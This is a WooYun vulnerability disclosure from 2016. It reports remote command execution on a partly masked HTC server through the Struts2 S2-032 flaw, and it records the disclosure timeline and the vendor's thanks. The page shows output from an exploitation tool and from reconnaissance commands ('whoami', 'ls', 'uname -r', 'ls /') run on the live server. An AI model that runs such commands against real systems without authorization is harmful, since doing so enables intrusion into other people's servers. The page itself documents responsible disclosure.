当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0210157

漏洞标题:HTC某服务器远程命令执行漏洞

相关厂商:宏达国际电子股份有限公司

漏洞作者: X,H

提交时间:2016-05-19 12:32

修复时间:2016-07-05 01:40

公开时间:2016-07-05 01:40

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-19: 细节已通知厂商并且等待厂商处理中
2016-05-21: 厂商已经确认,细节仅向厂商公开
2016-05-31: 细节向核心白帽子及相关领域专家公开
2016-06-10: 细节向普通白帽子公开
2016-06-20: 细节向实习白帽子公开
2016-07-05: 细节向公众公开

简要描述:

.

详细说明:


漏洞站点:**.**.**.**/APHSQD/login.action

htc1.png


存在S2-032 struts2漏洞

htc2.png


htc3.png


Target: **.**.**.**/APHSQD/forgetPassword.action
Useage: S2-032
Whoami: phsqdmgr
WebPath: /WEBAP/APSOURCE/APHSQD/JBOSS/DEFAULT/


cmd-> ls
====================================================================================================================================
classpath.sh
jboss_init_hpux.sh
jboss_init_redhat.sh
jboss_init_solaris.sh
jboss_init_suse.sh
probe.bat
probe.sh
run.bat
run.conf
run.jar
run.sh
security_cc.policy
shutdown.bat
shutdown.jar
shutdown.sh
shutdown-shortcut.bat
shutdown-shortcut.sh
startAPHSQD.sh
stopAPHSQD.sh
twiddle.bat
twiddle.jar
twiddle.sh
velocity.log
velocity.log.1
wsconsume.bat
wsconsume.sh
wsprovide.bat
wsprovide.sh
wsrunclient.bat
wsrunclient.sh
wstools.bat
wstools.sh


cmd-> uname -r
====================================================================================================================================
2.6.18-164.11.1.el5xen


cmd-> ls /
====================================================================================================================================
APBPP
APCCE
APCDWS
APENG
APESRM
APFOSP
APHSAP
APHSQD
APIIP
APINA
APMAVN
APMSP
APNPB
APNPC
APPXC
APPXD
APPXF
APQTD
APSRMPF
APSYSL1
bin
boot
dev
DUPNFS
etc
filestore
home
lib
lib64
lost+found
media
misc
mnt
net
NODUPFILE
opt
PBPP
PCCE
PCDWS
PENG
PESRM
PFOSP
PHSAP
PHSQD
PIIP
PINA
PMAVN
PMSP
PNPB
PNPC
PPXC
PPXD
PPXF
PPXM
PQTD
proc
PSRMPF
root
sbin
selinux
SOURCE
srv
sys
tftpboot
tmp
usr
var
WEBAP
WEBAPLOG

漏洞证明:

修复方案:

版权声明:转载请注明来源 X,H@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-05-21 01:37

厂商回复:

感謝通報

最新状态:

暂无